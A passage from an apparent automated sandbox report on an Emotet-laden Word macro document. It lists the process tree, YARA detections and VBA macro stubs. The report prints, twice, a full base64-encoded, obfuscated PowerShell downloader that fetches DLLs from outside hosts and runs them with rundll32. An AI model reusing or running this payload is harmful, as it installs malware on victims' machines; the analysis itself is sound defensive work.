JwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                                                                                                                              Imagebase:0x7ff622070000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: conhost.exe PID: 5620 Parent PID: 5632

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: msg.exe PID: 6068 Parent PID: 5632

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\msg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                                                                                                              Imagebase:0x7ff79a800000
                                                                                                                              File size:26112 bytes
                                                                                                                              MD5 hash:EEB395D8DD3C1D6593903BD640687948
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: powershell.exe PID: 1320 Parent PID: 5632

                                                                                                                              General

                                                                                                                              Start time:23:25:10
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                                                                                                                              Imagebase:0x7ff7bedd0000
                                                                                                                              File size:447488 bytes
                                                                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: rundll32.exe PID: 6760 Parent PID: 1320

                                                                                                                              General

                                                                                                                              Start time:23:25:18
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x7ff760c70000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: rundll32.exe PID: 6728 Parent PID: 6760

                                                                                                                              General

                                                                                                                              Start time:23:25:19
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: rundll32.exe PID: 6960 Parent PID: 6728

                                                                                                                              General

                                                                                                                              Start time:23:25:22
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: svchost.exe PID: 7136 Parent PID: 568

                                                                                                                              General

                                                                                                                              Start time:23:25:24
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: svchost.exe PID: 6008 Parent PID: 568

                                                                                                                              General

                                                                                                                              Start time:23:25:34
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: svchost.exe PID: 5616 Parent PID: 568

                                                                                                                              General

                                                                                                                              Start time:23:25:42
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              VBA Code

                                                                                                                              Call Graph

                                                                                                                              Graph

                                                                                                                              • Entrypoint
                                                                                                                              • Decryption Function
                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              • Show Help
                                                                                                                              callgraph 9 Document_open 129 Joieredaxt98oc6o Len:1,Create:1,Mid:1,ChrW:1,CreateObject:1 9->129 15 Gdxyahu7r2bnouqu 801 Us5rvv097omc6 129->801 x 2 801->15

                                                                                                                              Module: Dk5att0cu_9jsb

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "Dk5att0cu_9jsb"

                                                                                                                              2

                                                                                                                              Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                              3

                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                              4

                                                                                                                              Attribute VB_Creatable = False

                                                                                                                              5

                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                              6

                                                                                                                              Attribute VB_Exposed = True

                                                                                                                              7

                                                                                                                              Attribute VB_TemplateDerived = True

                                                                                                                              8

                                                                                                                              Attribute VB_Customizable = True

                                                                                                                              Non-Executed Functions
                                                                                                                              Subroutine Document_open, APIs: 45, Strings: 0, Number of lines: 3, Relevance: 69.003
                                                                                                                              APIsMeta Information

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Item

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

